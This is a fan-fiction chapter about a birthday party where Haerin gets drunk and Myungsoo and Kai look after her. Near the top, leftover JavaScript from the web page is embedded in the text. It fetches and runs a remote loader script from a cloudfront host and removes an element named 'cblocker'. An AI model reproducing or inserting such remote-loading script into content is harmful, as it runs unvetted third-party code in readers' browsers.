Chapter 20

The Presidential Son

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Your POV

 

“I’ll be going ahead!” I hollered as I fixed my shirt before opening the front door.

“Wait!” Two deep voices boomed. Sehun appeared from the kitchen, Kai went out of his room.

“Are you going to that party?” Sehun asked, I nodded. They frowned at me.

“Oh, come on guys, it’s a Friday night!” I muttered. Kai smiled.

“I’ll be going there too anyway, Sehun, you?”

“I don’t want to. Just get her home safe.” He waved one hand and went back eating.

“I’ll see you later, Kai!”

 

Narrator’s POV

 

Haerin stepped in clad in a loose short and a pair of black denim cutoffs. Dongwoo called him over.

“Oh, Dongwoo oppa, happy birthday!” She greeted.

“Thanks, I’m glad you came. Now, L? L!” He hollered despite the loud music. Haerin looked at him weirdly.

“What do you want hyung?” Myungsoo snapped.

“Accompany her or…..show her around!” He said before leaving. Haerin looked around.

Haerin bit her lip and stepped away slowly. Myungsoo looked up.

“Ya, where are you going?”

“Uhm…….Hyorin’s over there! I’ll see you later!” She waved him off and ran to her friend. Myungsoo looked away and walked to his seat.

 

Kai stepped in the house, he was welcomed by the birthday celebrant. He saw Myungsoo sitting down alone, he frowned, why wasn’t Haerin with him?

Soon, the alcohol was served. Kai looked around for Haerin as  he took sips from his drink.

 

“Here you go, a toast for the birthday celebrant!” Hoya handed Haerin a glass of punch. Haerin looked at the glass reluctantly. The guys had beer bottles with them. She smiled at her pink drink. Four seasons!

“Happy birthday, hyung!” Sungjong said as he raised his cup. After that everyone drank their drinks.

Myungsoo looked at Haerin as she refilled her drinks. He silently followed her as she went to look for another cup. Then he noticed she was wobbling a bit.

“Ya, Haerin-ah, are you drunk?” He patted her back. Then Haerin looked spun around.

“Oh, its Myungsoo!” She giggled a little and opened her arms. Myungsoo’s eyes widened.

 

Kai was talking with some of his friends, when he heard a famliar laugh. A laugh he rarely hears. He looked up and found Haerin giggling at a confused Myungsoo.

“It’s my seatmate! Kim Myungsoo!” She cheered as she wrapped her arms around his neck. Myungsoo stumbled back a little. Girls muttered and looked away with jealousy, if you hug Myungsoo, you’ll get pushed away.

“Ya, let go.” L squirmed. Haerin grinned and let go of him.

“It’s my rude partner.” She chuckled, almost tripping on the floor, Myungsoo held her arm.

“Did you let her drink?” Kai appeared with a bothered look.

“She cant?” Myungsoo asked.

“Zero tolerance.” Kai replied and tucked a lock of hair behind her ear. Myungsoo nodded.

“Jonginie!” She giggled.

“I’ll take her out for some air.” L said as he wrapped his arm around her waist and slowly pulled her out of the house. Kai grinned at the two as they left.

“Aigoo, don’t fall too hard, L.” He smiled and walked back to his girls.

 

The two sat down on the porch steps. Haerin looked up at the sky.

“Stars are out today!” She smiled. Myungsoo looked at her. Her shiny black hair sparkled under the moonlight and her brown eyes were twinkling as she bit her lip. Then she looked at him.

“Why didn’t you tell us you couldn’t drink?” He chided. Haerin shook her head and leaned on him.

“Myungsoo is my new friend.” She giggled again, Myungsoo grunted.

“You are right?”

“Right?”

“Right?”

“Arasso, I’m your new friend.” Myungsoo shrugged her off.

“That’s good.” She smiled then her eyes closed, Myungsoo looked at her. Then his lips formed a small smile.

“Good night, goody two shoes agasshi.”

 

“Oh, she’s asleep.” Kai said as he went out of the house. Myungsoo nodded.

“I’ll take her home~”

Myungsoo looked around them, some girls had followed Kai out.

“She wouldn’t like that. It’s okay, she can sleep over, Sunggyu hyung has an extra room.”

Kai raised his brow, he saw the firm grasp of Myungsoo on Haerin’s shoulder.

“Really? Arasso. Thanks.” He patted his shoulder and went to his car.

 

Myungsoo waited for the guests to disperse, that was when he came inside the house with Haerin in his arms. Hoya and Sungjong almost trippred when they saw him.

“Ya, what did you do~”

“Apparently, she cant drink.” He said while giving his Dongwoo hyung a hard look.

“Hyung, my room is it open?” L asked Sunggyu.

“Yes, it is. Let’s go settle her there.”

 

Myungsoo laid her on the bed and put the blankets over her. Sunggyu exited the room with a giddy smile on his face.

Myungsoo pulled the hair out of her face, and he slowly her hair with a soft expression on his face.

tumblr_m0hlyyuKLo1qfkhqjo2_250.gif

“Chalja, chinguya.(Good night, friend.)” He smiled.

 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++